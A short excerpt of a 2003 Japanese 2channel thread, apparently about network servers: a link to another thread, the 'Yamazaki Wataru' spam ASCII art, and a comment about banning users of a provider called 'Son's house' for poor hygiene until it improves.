
[0198 DNS未登録さん 03/07/06 03:35 ID:???]

http://news2.2ch.net/test/read.cgi/newsplus/1057237070/

[0199 山崎 渉 03/07/15 11:10 ID:???]

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

[0200 DNS未登録さん 03/07/26 11:29 ID:???]

孫さん家の人が衛生管理していないので、「出禁」にしています。
衛生管理出来る様になったら、タイム系サーバーを追加して
監視兵を置くかな・・・